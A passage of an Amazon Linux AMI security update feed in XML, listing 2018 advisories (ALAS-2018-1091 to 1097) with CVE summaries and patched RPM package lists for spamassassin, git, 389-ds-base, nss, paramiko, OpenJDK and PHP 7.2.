arch="x86_64"><filename>Packages/php72-imap-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" 
version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.11" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.11-1.6.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.11" release="1.6.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-opcache-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.11" release="1.6.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-gmp-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.11" release="1.6.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-gd-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.11-1.6.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.11" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.11-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1091</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1091: important priority package update for spamassassin</title><issued date="2018-10-17 21:58:00" /><updated date="2018-10-18 22:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-11781:
A flaw was found in the way a local user on the SpamAssassin server could inject code in the meta rule syntax. This could cause arbitrary code execution on the server when these rules are being processed.
1629536:
CVE-2018-11781 spamassassin: Local user code injection in the meta rule syntax
CVE-2018-11780:
A potential Remote Code Execution bug exists with the PDFInfo plugin in Apache SpamAssassin before 3.4.2.
1629532:
CVE-2018-11780 spamassassin: Potential remote code execution vulnerability in PDFInfo plugin
CVE-2017-15705:
A flaw was found in the way SpamAssassin processes HTML email containing unclosed HTML tags. A carefully crafted mail message could cause SpamAssassin to consume significant resources. If a large number of these messages are sent, a denial of service could occur, potentially delaying or preventing the delivery of email.
1629521:
CVE-2017-15705 spamassassin: Certain unclosed tags in crafted emails allow for scan timeouts and result in denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15705" title="" id="CVE-2017-15705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11780" title="" id="CVE-2018-11780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11781" title="" id="CVE-2018-11781" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="spamassassin-debuginfo" version="3.4.2" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/spamassassin-debuginfo-3.4.2-2.14.amzn1.x86_64.rpm</filename></package><package name="spamassassin" version="3.4.2" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/spamassassin-3.4.2-2.14.amzn1.x86_64.rpm</filename></package><package name="spamassassin-debuginfo" version="3.4.2" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/spamassassin-debuginfo-3.4.2-2.14.amzn1.i686.rpm</filename></package><package name="spamassassin" version="3.4.2" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/spamassassin-3.4.2-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1092</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1092: important priority package update for gitolite3</title><issued date="2018-10-17 22:01:00" /><updated date="2018-10-18 22:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-16976:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16976" title="" id="CVE-2018-16976" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gitolite3" version="3.6.9" release="1.1.amzn1" epoch="1" arch="noarch"><filename>Packages/gitolite3-3.6.9-1.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1093</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1093: important priority package update for git</title><issued date="2018-10-17 22:02:00" /><updated date="2018-10-18 22:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-17456:
Git before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive &quot;git clone&quot; of a superproject if a .gitmodules file has a URL field beginning with a &#039;-&#039; character.
1636619:
CVE-2018-17456 git: arbitrary code execution via .gitmodules
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17456" title="" id="CVE-2018-17456" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-p4" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.14.5" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.14.5-1.59.amzn1.x86_64.rpm</filename></package><package name="perl-Git" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.14.5" release="1.59.amzn1" epoch="0" 
arch="noarch"><filename>Packages/git-cvs-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.14.5" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.14.5-1.59.amzn1.x86_64.rpm</filename></package><package name="git" version="2.14.5" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.14.5-1.59.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.14.5" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.14.5-1.59.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.14.5" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.14.5-1.59.amzn1.x86_64.rpm</filename></package><package name="git-debuginfo" version="2.14.5" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.14.5-1.59.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.14.5" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.14.5-1.59.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.14.5" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.14.5-1.59.amzn1.i686.rpm</filename></package><package name="git" version="2.14.5" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.14.5-1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1094</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1094: medium priority package update for 389-ds-base</title><issued date="2018-10-23 18:40:00" /><updated date="2018-10-23 23:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14638:
A double-free of a password policy structure was found in the way slapd was handling certain errors during persistent search. An unauthenticated attacker could use this flaw to crash Directory Server.
1626079:
CVE-2018-14638 389-ds-base: Crash in delete_passwdPolicy when persistent search connections are terminated unexpectedly
CVE-2018-14624:
A vulnerability was discovered in 389-ds-base. The lock controlling the error log was not correctly used when re-opening the log file in log__error_emergency(). An attacker could send a flood of modifications to a very large DN, which would cause slapd to crash.
1619450:
CVE-2018-14624 389-ds-base: Server crash through modify command with large DN
CVE-2018-10935:
A flaw was found in the 389 Directory Server that allows users to cause a crash in the LDAP server using ldapsearch with server side sort.
1613606:
CVE-2018-10935 389-ds-base: ldapsearch with server side sort allows users to cause a crash
CVE-2018-10850:
A race condition was found in the way 389-ds-base handles persistent search, resulting in a crash if the server is under load. An anonymous attacker could use this flaw to trigger a denial of service.
1588056:
CVE-2018-10850 389-ds-base: race condition on reference counter leads to DoS using persistent search
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10850" title="" id="CVE-2018-10850" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10935" title="" id="CVE-2018-10935" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14624" title="" id="CVE-2018-14624" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14638" title="" id="CVE-2018-14638" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.7.5-28.58.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.7.5-28.58.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.7.5-28.58.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.7.5" release="28.58.amzn1" epoch="0" 
arch="i686"><filename>Packages/389-ds-base-devel-1.3.7.5-28.58.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.7.5-28.58.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.7.5" release="28.58.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.7.5-28.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1095</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1095: medium priority package update for nss</title><issued date="2018-10-23 18:41:00" /><updated date="2018-10-23 23:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-12384:
A flaw was found in the way NSS responded to an SSLv2-compatible ClientHello with a ServerHello that had an all-zero random. A man-in-the-middle attacker could use this flaw in a passive replay attack.
1622089:
CVE-2018-12384 nss: ServerHello.random is all zeros when handling a v2-compatible ClientHello
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12384" title="" id="CVE-2018-12384" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.36.0" release="5.82.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.36.0-5.82.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.36.0" release="5.82.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-tools-3.36.0-5.82.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.36.0" release="5.82.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.36.0-5.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1096</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1096: critical priority package update for python-paramiko</title><issued date="2018-10-23 18:43:00" /><updated date="2018-10-23 23:57:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1000805:
Paramiko version 2.4.1, 2.3.2, 2.2.3, 2.1.5, 2.0.8, 1.18.5, 1.17.6 contains an Incorrect Access Control vulnerability in the SSH server that can result in RCE. This attack appears to be exploitable via network connectivity.
1637263:
CVE-2018-1000805 python-paramiko: Authentication bypass in auth_handler.py
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000805" title="" id="CVE-2018-1000805" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-paramiko" version="1.15.1" release="2.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-paramiko-1.15.1-2.7.amzn1.noarch.rpm</filename></package><package name="python26-paramiko" version="1.15.1" release="2.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-paramiko-1.15.1-2.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1097</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1097: critical priority package update for java-1.8.0-openjdk</title><issued date="2018-11-05 19:33:00" /><updated date="2018-11-08 00:57:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3214:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Sound). Supported versions that are affected are Java SE: 6u201, 7u191 and 8u182; Java SE Embedded: 8u181; JRockit: R28.3.19. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
1639301:
CVE-2018-3214 OpenJDK: Infinite loop in RIFF format reader (Sound, 8205361)
CVE-2018-3183:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: Scripting). Supported versions that are affected are Java SE: 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. While the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).
1639268:
CVE-2018-3183 OpenJDK: Unrestricted access to scripting engine (Scripting, 8202936)
CVE-2018-3180:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JSSE). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via SSL/TLS to compromise Java SE, Java SE Embedded, JRockit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded, JRockit accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded, JRockit accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L).
1639484:
CVE-2018-3180 OpenJDK: Missing endpoint identification algorithm check during TLS session resumption (JSSE, 8202613)
CVE-2018-3169:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Hotspot). Supported versions that are affected are Java SE: 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1639293:
CVE-2018-3169 OpenJDK: Improper field access checks (Hotspot, 8199226)
CVE-2018-3149:
Vulnerability in the Java SE, Java SE Embedded, JRockit component of Oracle Java SE (subcomponent: JNDI). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181; JRockit: R28.3.19. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, JRockit. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, JRockit, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE, Java SE Embedded, JRockit. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g. through a web service which supplies data to the APIs. CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).
1639834:
CVE-2018-3149 OpenJDK: Incomplete enforcement of the trustURLCodebase restriction (JNDI, 8199177)
CVE-2018-3139:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Networking). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1639442:
CVE-2018-3139 OpenJDK: Leak of sensitive header data via HTTP redirect (Networking, 8196902)
CVE-2018-3136:
Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: Security). Supported versions that are affected are Java SE: 6u201, 7u191, 8u182 and 11; Java SE Embedded: 8u181. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, Java SE Embedded, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g. code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g. code installed by an administrator). CVSS 3.0 Base Score 3.4 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N).
1639755:
